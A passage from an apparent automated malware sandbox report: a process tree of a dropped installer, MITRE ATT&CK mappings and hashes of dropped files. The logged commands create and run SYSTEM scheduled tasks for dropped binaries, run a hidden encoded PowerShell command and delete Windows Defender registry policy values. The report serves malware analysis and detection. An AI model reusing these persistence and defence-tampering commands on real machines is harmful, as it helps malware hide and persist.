                                                                                                            schtasks /run /I /tn "giUfuqrwg"
                                                                                                            2⤵
                                                                                                              PID:4924
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /DELETE /F /TN "giUfuqrwg"
                                                                                                              2⤵
                                                                                                                PID:4668
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /CREATE /TN "VgOpnHVQDAdMZqNFB" /SC once /ST 01:58:34 /RU "SYSTEM" /TR "\"C:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\CpkWyck.exe\" aF /site_id 525403 /S" /V1 /F
                                                                                                                2⤵
                                                                                                                • Drops file in Windows directory
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:2688
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /run /I /tn "VgOpnHVQDAdMZqNFB"
                                                                                                                2⤵
                                                                                                                  PID:2684
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                1⤵
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:4352
                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                  2⤵
                                                                                                                    PID:3344
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                  1⤵
                                                                                                                    PID:4080
                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                    1⤵
                                                                                                                      PID:4192
                                                                                                                    • C:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\CpkWyck.exe
                                                                                                                      C:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\CpkWyck.exe aF /site_id 525403 /S
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Checks computer location settings
                                                                                                                      • Drops Chrome extension
                                                                                                                      • Drops desktop.ini file(s)
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Drops file in Program Files directory
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:1508
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        schtasks /DELETE /F /TN "bNHXguvSZYiOwSiXLC"
                                                                                                                        2⤵
                                                                                                                          PID:1336
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                          2⤵
                                                                                                                            PID:3620
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:1840
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                              2⤵
                                                                                                                                PID:2364
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:2736
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\SHsJRQZsU\nQsCXT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "DNDvMcbpefrYjKZ" /V1 /F
                                                                                                                                  2⤵
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:1324
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /CREATE /TN "DNDvMcbpefrYjKZ2" /F /xml "C:\Program Files (x86)\SHsJRQZsU\NgPnuNE.xml" /RU "SYSTEM"
                                                                                                                                  2⤵
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:4580
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /END /TN "DNDvMcbpefrYjKZ"
                                                                                                                                  2⤵
                                                                                                                                    PID:1696
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /DELETE /F /TN "DNDvMcbpefrYjKZ"
                                                                                                                                    2⤵
                                                                                                                                      PID:364
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "WEhIDiLYPHjasB" /F /xml "C:\Program Files (x86)\ATZmuaBwNwmU2\QSPbuAJ.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:1280
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "uMLBCyigOFctO2" /F /xml "C:\ProgramData\fxkldoUMcXUSOxVB\nbuzJck.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:2128
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "kiDkdQMpQtFhhDeJz2" /F /xml "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\nrxNlJt.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:1404
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "VjVOLqrPjSeucnEqiOK2" /F /xml "C:\Program Files (x86)\aJAQLsoDkiWqC\OQFLScx.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:3692
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "mDNVJgqIdbaAfzWWp" /SC once /ST 05:14:37 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\MYjwJFnMfsmfKHMw\eCYVkiJL\GRvLwFb.dll\",#1 /site_id 525403" /V1 /F
                                                                                                                                      2⤵
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:3348
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /run /I /tn "mDNVJgqIdbaAfzWWp"
                                                                                                                                      2⤵
                                                                                                                                        PID:2476
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                        2⤵
                                                                                                                                          PID:2348
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:1224
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                            2⤵
                                                                                                                                              PID:3292
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:4668
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /DELETE /F /TN "VgOpnHVQDAdMZqNFB"
                                                                                                                                                2⤵
                                                                                                                                                  PID:2272
                                                                                                                                              • C:\Windows\system32\rundll32.EXE
                                                                                                                                                C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MYjwJFnMfsmfKHMw\eCYVkiJL\GRvLwFb.dll",#1 /site_id 525403
                                                                                                                                                1⤵
                                                                                                                                                  PID:4128
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MYjwJFnMfsmfKHMw\eCYVkiJL\GRvLwFb.dll",#1 /site_id 525403
                                                                                                                                                    2⤵
                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                    PID:4348
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /DELETE /F /TN "mDNVJgqIdbaAfzWWp"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:3024

                                                                                                                                                  Network

                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                  Execution

                                                                                                                                                  Scheduled Task

                                                                                                                                                  1
                                                                                                                                                  T1053

                                                                                                                                                  Persistence

                                                                                                                                                  Scheduled Task

                                                                                                                                                  1
                                                                                                                                                  T1053

                                                                                                                                                  Privilege Escalation

                                                                                                                                                  Scheduled Task

                                                                                                                                                  1
                                                                                                                                                  T1053

                                                                                                                                                  Credential Access

                                                                                                                                                  Credentials in Files

                                                                                                                                                  1
                                                                                                                                                  T1081

                                                                                                                                                  Discovery

                                                                                                                                                  Query Registry

                                                                                                                                                  4
                                                                                                                                                  T1012

                                                                                                                                                  System Information Discovery

                                                                                                                                                  4
                                                                                                                                                  T1082

                                                                                                                                                  Collection

                                                                                                                                                  Data from Local System

                                                                                                                                                  1
                                                                                                                                                  T1005

                                                                                                                                                  Replay Monitor

                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                  Downloads

                                                                                                                                                  • C:\Program Files (x86)\ATZmuaBwNwmU2\QSPbuAJ.xml
                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    97d42348315ae5111d9ee11716c05294

                                                                                                                                                    SHA1

                                                                                                                                                    4d624aeb790ad35db0a392f96f80837a95044f77

                                                                                                                                                    SHA256

                                                                                                                                                    bb690d12518def6f79244c39f244dd7da6a8a77c46f0b15f8e92b08abfaab094

                                                                                                                                                    SHA512

                                                                                                                                                    233a5c1c888d66d6da2f000279b6ac2ec1562a45dd283159213b25960c7200e7c5d0f5a96ea6992dc8c713cd61c384ebbab6459341f11c6e5fc0b27efe284acf

                                                                                                                                                  • C:\Program Files (x86)\SHsJRQZsU\NgPnuNE.xml
                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    cce037a915d785307d5f13509285f0db

                                                                                                                                                    SHA1

                                                                                                                                                    6148c4294b69fd35f4af4fbf42377bc9741e7363

                                                                                                                                                    SHA256

                                                                                                                                                    1d41486ce4bf07897ee39faf876e1d874381b7fe5cb327c459a1952d8f3e949f

                                                                                                                                                    SHA512

                                                                                                                                                    643681e0f9cc262065a063508db0e5e7d45109a99c35bb610fb880c5899b70139b1cfe7f2d6e9834c253eeb734113a4860a38cc80aab6147fecae53497768cf0

                                                                                                                                                  • C:\Program Files (x86)\aJAQLsoDkiWqC\OQFLScx.xml
                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    48afe712a60529c18794e7ebc11e3f27

                                                                                                                                                    SHA1

                                                                                                                                                    b2209c6da9365f1d41dae06419c1e1a90513594d

                                                                                                                                                    SHA256

                                                                                                                                                    525a8e9a6eb371385cf3a8253b70cca89c3d14a4cfc1f27f5420bd09af38eb75

                                                                                                                                                    SHA512

                                                                                                                                                    07649d983b0365de0e650e3f01b317006d25fe19a7cc0d23103e9f7a9dfef97784614bd89e202e5a8cd35a7189ff6449c133f50d74ea6763170aee5315b57e4a

                                                                                                                                                  • C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\nrxNlJt.xml
                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    598a82cc1fc5ee1cff4c4265fe050877

                                                                                                                                                    SHA1

                                                                                                                                                    b83ebaf35a019a237e6373d091a00369c5f8860b

                                                                                                                                                    SHA256

                                                                                                                                                    5419c491a3a7b29b4ef2602c54506f1e7310306871b59b1337f7ef7903b29560

                                                                                                                                                    SHA512

                                                                                                                                                    fe3d93e43a5711f6e2aecc27d3dc490b81c53c90503103e4d7b33db22069ee5dfef583bc0620c0510d61add94a875f0c7db6d14c8192243b2e59b2a92db6bd4d

                                                                                                                                                  • C:\ProgramData\fxkldoUMcXUSOxVB\nbuzJck.xml
                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    ebd23a32dbf478b4593493dc098bc90b

                                                                                                                                                    SHA1

                                                                                                                                                    80a35e470614aff5f3554e788eaaecce0f2aa24b

                                                                                                                                                    SHA256

                                                                                                                                                    ec55d445321ad08c2e4796bc7462d07118755322c944a10e0599a5ce5ae87883

                                                                                                                                                    SHA512

                                                                                                                                                    8a1acc9eeb6dc86239895f9e026d8642e6716f6f06360b873f552ad408855721602af47fe0c41b3f3c98fbbaa53d69ce5c6954ee120ac55f1570322c994dcb3a

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    6cf293cb4d80be23433eecf74ddb5503

                                                                                                                                                    SHA1

                                                                                                                                                    24fe4752df102c2ef492954d6b046cb5512ad408

                                                                                                                                                    SHA256

                                                                                                                                                    b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                                                                                                    SHA512

                                                                                                                                                    0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                    Filesize

                                                                                                                                                    64B

                                                                                                                                                    MD5

                                                                                                                                                    5caad758326454b5788ec35315c4c304

                                                                                                                                                    SHA1

                                                                                                                                                    3aef8dba8042662a7fcf97e51047dc636b4d4724

                                                                                                                                                    SHA256

                                                                                                                                                    83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

                                                                                                                                                    SHA512

                                                                                                                                                    4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSA472.tmp\Install.exe
                                                                                                                                                    Filesize

                                                                                                                                                    6.4MB

                                                                                                                                                    MD5

                                                                                                                                                    9f2c0515a75d96b701e22dfd8bd2c904

                                                                                                                                                    SHA1

                                                                                                                                                    f34624173a6afdd06b58b2c2899a79c8627b4b47

                                                                                                                                                    SHA256

                                                                                                                                                    7a6611601433b726f55d001a0aec07c73be34eadf2848cd164bc780c37b9dce5

                                                                                                                                                    SHA512

                                                                                                                                                    029fb14545ca478b7fc5aafa714a6b445f51a1d941dd591703b4574d56c72b2dfd4b2e8aa65579615ce1c5547a2edad45f4341f573a4fa28659c03749d5c6703

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSA472.tmp\Install.exe
                                                                                                                                                    Filesize

                                                                                                                                                    6.4MB

                                                                                                                                                    MD5

                                                                                                                                                    9f2c0515a75d96b701e22dfd8bd2c904

                                                                                                                                                    SHA1

                                                                                                                                                    f34624173a6afdd06b58b2c2899a79c8627b4b47

                                                                                                                                                    SHA256

                                                                                                                                                    7a6611601433b726f55d001a0aec07c73be34eadf2848cd164bc780c37b9dce5

                                                                                                                                                    SHA512

                                                                                                                                                    029fb14545ca478b7fc5aafa714a6b445f51a1d941dd591703b4574d56c72b2dfd4b2e8aa65579615ce1c5547a2edad45f4341f573a4fa28659c03749d5c6703

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSA8F7.tmp\Install.exe
                                                                                                                                                    Filesize

                                                                                                                                                    7.0MB

                                                                                                                                                    MD5

                                                                                                                                                    54042a806886288ad60c64e7adaa2f53

                                                                                                                                                    SHA1

                                                                                                                                                    30ee71d3a30dff86dad3224ea57d844e18505cc1

                                                                                                                                                    SHA256

                                                                                                                                                    facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487

                                                                                                                                                    SHA512

                                                                                                                                                    a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSA8F7.tmp\Install.exe
                                                                                                                                                    Filesize

                                                                                                                                                    7.0MB

                                                                                                                                                    MD5

                                                                                                                                                    54042a806886288ad60c64e7adaa2f53

                                                                                                                                                    SHA1

                                                                                                                                                    30ee71d3a30dff86dad3224ea57d844e18505cc1

                                                                                                                                                    SHA256

                                                                                                                                                    facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487

                                                                                                                                                    SHA512

                                                                                                                                                    a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\CsJMQOh.exe
                                                                                                                                                    Filesize

                                                                                                                                                    7.0MB

                                                                                                                                                    MD5

                                                                                                                                                    54042a806886288ad60c64e7adaa2f53

                                                                                                                                                    SHA1

                                                                                                                                                    30ee71d3a30dff86dad3224ea57d844e18505cc1

                                                                                                                                                    SHA256

                                                                                                                                                    facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487

                                                                                                                                                    SHA512

                                                                                                                                                    a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\CsJMQOh.exe
                                                                                                                                                    Filesize

                                                                                                                                                    7.0MB

                                                                                                                                                    MD5

                                                                                                                                                    54042a806886288ad60c64e7adaa2f53

                                                                                                                                                    SHA1

                                                                                                                                                    30ee71d3a30dff86dad3224ea57d844e18505cc1

                                                                                                                                                    SHA256

                                                                                                                                                    facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487

                                                                                                                                                    SHA512

                                                                                                                                                    a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001

                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
                                                                                                                                                    Filesize

                                                                                                                                                    717B

                                                                                                                                                    MD5

                                                                                                                                                    ec8ff3b1ded0246437b1472c69dd1811

                                                                                                                                                    SHA1

                                                                                                                                                    d813e874c2524e3a7da6c466c67854ad16800326

                                                                                                                                                    SHA256

                                                                                                                                                    e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab

                                                                                                                                                    SHA512

                                                                                                                                                    e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552

                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\48F3BB146086CEF37D471FBE460215C9
                                                                                                                                                    Filesize

                                                                                                                                                    503B

                                                                                                                                                    MD5

                                                                                                                                                    2e4e7bcc7306809dcb65acf70d463b18

                                                                                                                                                    SHA1

                                                                                                                                                    482270beb8ce064fce5bdadcb702150f82d1cd32

                                                                                                                                                    SHA256

                                                                                                                                                    10b5d9c60469f883f25a3a1f5cf82e807a31ed967d78625ee36cdb603c5c9637

                                                                                                                                                    SHA512

                                                                                                                                                    2c0ca374a86b9e9cff2ec63e57792151c2cff1b60dc3035b76beda3d08c52694ab52e9040c57907d714d3544eed3ba4bb91ea27047102c835490bf29b59436a8

                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
                                                                                                                                                    Filesize

                                                                                                                                                    192B

                                                                                                                                                    MD5

                                                                                                                                                    8173335853e4a8f69400cc3554ba5849

                                                                                                                                                    SHA1

                                                                                                                                                    297f4434174b763fd779b6490dc00bda3d22d17f

                                                                                                                                                    SHA256

                                                                                                                                                    4d4c92c1692260b240c470a90cee609d7918f34342da4cf2f0a177f202711fef

                                                                                                                                                    SHA512

                                                                                                                                                    2a39a37284a3369a3efd926771ee3a5bd533021edb003bb7f4bcecd671f07c443a23d3288d4048325c2c58a190a06838ccf9ff8035680f602b60b355f4ec2318

                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\48F3BB146086CEF37D471FBE460215C9
                                                                                                                                                    Filesize

                                                                                                                                                    560B

                                                                                                                                                    MD5

                                                                                                                                                    5b956848345096d6aa12adadcb0a800d

                                                                                                                                                    SHA1

                                                                                                                                                    eca9b9d9c0e04057025e101643a8d8f0306c2f02

                                                                                                                                                    SHA256

                                                                                                                                                    bfe51e3552fd790a55b9229b60c50ef1250a4f0b588bf80b1191fc7599424987

                                                                                                                                                    SHA512

                                                                                                                                                    32e4f9064d4151f59310301cafc3e5dc7c9690b65f2008681855b9053c9966fa2039f37b4eb431c0c9f77f4a458048eb8f6ab0055c298fbb2c0f8ed86234d0c0

                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                                                                                                    Filesize

                                                                                                                                                    1KB

                                                                                                                                                    MD5

                                                                                                                                                    33b19d75aa77114216dbc23f43b195e3

                                                                                                                                                    SHA1

                                                                                                                                                    36a6c3975e619e0c5232aa4f5b7dc1fec9525535

                                                                                                                                                    SHA256

                                                                                                                                                    b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

                                                                                                                                                    SHA512

                                                                                                                                                    676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                    Filesize

                                                                                                                                                    11KB

                                                                                                                                                    MD5

                                                                                                                                                    7016933fe1c178f045bd987d57d0c903

                                                                                                                                                    SHA1

                                                                                                                                                    ed6ac6a2504f54e726bbeb139c9278078ab44e71

                                                                                                                                                    SHA256

                                                                                                                                                    653606b273ac2f79ca3395f63ccd4bbc73f582118caa537bd608fd748fb1df18

                                                                                                                                                    SHA512

                                                                                                                                                    9a6b6cdf4e26beedbe46d2c29f7e88014adeec3423e40e1b26fe83f9b636ac5df32760f8a69a97f7f628567f7f860a741bdf1426300bea1f7887e2444f0910bb

                                                                                                                                                  • C:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\CpkWyck.exe
                                                                                                                                                    Filesize

                                                                                                                                                    7.0MB

                                                                                                                                                    MD5

                                                                                                                                                    54042a806886288ad60c64e7adaa2f53

                                                                                                                                                    SHA1

                                                                                                                                                    30ee71d3a30dff86dad3224ea57d844e18505cc1

                                                                                                                                                    SHA256

                                                                                                                                                    facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487

                                                                                                                                                    SHA512

                                                                                                                                                    a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001

                                                                                                                                                  • C:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\CpkWyck.exe
                                                                                                                                                    Filesize

                                                                                                                                                    7.0MB

                                                                                                                                                    MD5

                                                                                                                                                    54042a806886288ad60c64e7adaa2f53

                                                                                                                                                    SHA1

                                                                                                                                                    30ee71d3a30dff86dad3224ea57d844e18505cc1

                                                                                                                                                    SHA256

                                                                                                                                                    facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487

                                                                                                                                                    SHA512

                                                                                                                                                    a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001

                                                                                                                                                  • C:\Windows\Temp\MYjwJFnMfsmfKHMw\eCYVkiJL\GRvLwFb.dll
                                                                                                                                                    Filesize

                                                                                                                                                    6.2MB

                                                                                                                                                    MD5

                                                                                                                                                    20ec46e9ba6365aa20cbd0901c403290

                                                                                                                                                    SHA1

                                                                                                                                                    0111156a4df15b72e0aec47889d18c867e600aca

                                                                                                                                                    SHA256

                                                                                                                                                    7bfae3944f725b82aafdf29968fe6d1155131be480f5e8559410dc824609b6ba

                                                                                                                                                    SHA512

                                                                                                                                                    6dfef0d8bd76166ddfbda8dffe4604d8443e02267daf3b6e2c990151a833352ad245e4510416e5d327969614e36158f6ed67299a5da6dcf29dcd18a7132c3d5d

                                                                                                                                                  • C:\Windows\Temp\MYjwJFnMfsmfKHMw\eCYVkiJL\GRvLwFb.dll
                                                                                                                                                    Filesize

                                                                                                                                                    6.2MB

                                                                                                                                                    MD5

                                                                                                                                                    20ec46e9ba6365aa20cbd0901c403290

                                                                                                                                                    SHA1

                                                                                                                                                    0111156a4df15b72e0aec47889d18c867e600aca

                                                                                                                                                    SHA256

                                                                                                                                                    7bfae3944f725b82aafdf29968fe6d1155131be480f5e8559410dc824609b6ba

                                                                                                                                                    SHA512

                                                                                                                                                    6dfef0d8bd76166ddfbda8dffe4604d8443e02267daf3b6e2c990151a833352ad245e4510416e5d327969614e36158f6ed67299a5da6dcf29dcd18a7132c3d5d

                                                                                                                                                  • C:\Windows\system32\GroupPolicy\Machine\Registry.pol
                                                                                                                                                    Filesize

                                                                                                                                                    5KB

                                                                                                                                                    MD5

                                                                                                                                                    e2436407f179c09e369dd38df9fafcc6

                                                                                                                                                    SHA1

                                                                                                                                                    d0fba43460b9348336da2e405a69c463f7573e82

                                                                                                                                                    SHA256

                                                                                                                                                    2f936e14255a9c0b6ccb4772f00504d34aa3288ea431680752a84ad1f9196d14

                                                                                                                                                    SHA512

                                                                                                                                                    ff3bb873625f685b707f056990c9735e53d156d2ea599de6f6568632d84b9fccf1ac8efc0fe457c1588d92c0cfb9c0c5ca07503ca9d27183d223f172023599ae

                                                                                                                                                  • C:\Windows\system32\GroupPolicy\gpt.ini
                                                                                                                                                    Filesize

                                                                                                                                                    268B

                                                                                                                                                    MD5

                                                                                                                                                    a62ce44a33f1c05fc2d340ea0ca118a4

                                                                                                                                                    SHA1

                                                                                                                                                    1f03eb4716015528f3de7f7674532c1345b2717d

                                                                                                                                                    SHA256

                                                                                                                                                    9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

                                                                                                                                                    SHA512

                                                                                                                                                    9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

                                                                                                                                                  • memory/32-213-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/908-179-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/936-146-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/1040-178-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/1080-158-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/1176-196-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/1220-141-0x0000000010000000-0x0000000011000000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    16.0MB

                                                                                                                                                  • memory/1220-138-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/1432-135-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/1456-149-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/1508-236-0x0000000005B10000-0x0000000005B77000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    412KB

                                                                                                                                                  • memory/1508-250-0x00000000066F0000-0x00000000067A6000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    728KB

                                                                                                                                                  • memory/1508-246-0x00000000064F0000-0x000000000656C000-memory.dmp
                                                                                                                                                    Filesize

